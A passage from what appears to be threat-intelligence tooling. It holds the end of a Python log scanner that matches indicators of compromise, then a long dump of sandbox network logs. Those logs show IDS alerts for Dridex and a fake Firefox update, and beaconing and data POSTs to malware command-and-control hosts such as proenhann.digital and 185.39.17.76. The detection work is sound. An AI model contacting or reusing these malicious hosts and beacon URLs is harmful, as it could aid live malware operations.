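            hits.add(ip)
        if port and (ip, int(port)) in iocs["ip_ports"]:
            hits.add(f"{ip}:{port}")
    for name in HOSTNAME_RE.findall(line):
        name = name.lower()
        if _is_ip(name):
            continue
        hits.update(d for d in iocs["domains"] if name == d or name.endswith("." + d))
    return sorted(hits)


def scan_logs(lines, iocs: dict) -> list:
    """Return (line, hits) for every log line that matched at least one indicator."""
    results = []
    for line in lines:
        hits = match_line(line, iocs)
        if hits:
            results.append((line, hits))
    return results


if __name__ == "__main__":
    for line, hits in scan_logs(LOG_LINES, extract_iocs(REPORT_ROWS)):
        print(line, "=>", ", ".join(hits))
```

The bare-IP and the IP:port indicators are kept apart on purpose. The two port-25 destinations were reached by a spam module, and such destinations are normally third-party mail exchangers rather than attacker infrastructure, so a consumer that blocks on bare IPs would block the wrong thing; the port-qualified pair (67.195.204.77:25) is the signal worth alerting on, while the bare IP hit on 52.101.41.22:587 in the constructed log only says the same host was contacted on another port.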
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49707 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49706 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49705 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.53.21:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49712 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49716 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49718 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49726 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49719 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49717 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49731 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49732 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49713 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49725 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49729 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49739 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49736 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49740 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49741 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49714 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49737 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49744 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49746 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49709 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49742 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49711 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49745 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49720 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49730 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.40.117:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49715 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49721 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49714 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49725 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49732 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49726 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49745 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49742 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49735 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49718 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49734 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49741 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 185.39.17.76:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49739 -> 185.39.17.76:443
Source: global traffic | TCP traffic: 192.168.2.5:49724 -> 52.101.41.22:25
Source: global traffic | TCP traffic: 192.168.2.5:49743 -> 67.195.204.77:25
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 47 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=tdlpOlA0dv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 14879 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=prnj59Ed27OUE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 15043 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Q2bbxdfG3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20512 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=90CE2KUM8A | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2744 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QbKUhM6j50v4Yj5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 583928 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 85 | Host: proenhann.digital
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f832a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f8c2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f8d2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c842a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c852a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c862a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c872a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c802a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c812a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c822a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c832a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c8c2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c8d2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d842a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d852a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d862a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d872a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.73.98 (this connection is listed 50 times in the report)
